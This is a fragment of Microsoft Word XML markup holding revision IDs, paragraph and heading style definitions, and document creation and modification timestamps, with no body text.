    <w:tmpl w:val="D6E8441C"/>
    <w:lvl w:ilvl="0" w:tplc="38DA8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7"/>
    <w:rsid w:val="00031A15"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F41CA"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004148F7"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="007374EF"/>
    <w:rsid w:val="0074256E"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B25A25"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00DA4657"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA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887E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779"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="440" w:lineRule="exact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346CE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064E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines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77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377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6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064E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A3779"/>
    <w:rPr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AF064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A3779"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B6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05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05D"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007374EF"/>
    <w:pPr>
      <w:widowControl w:val="0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3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7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E991-657F-4D14-80E0-94E3ED345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2025-04-22T14:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T19:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>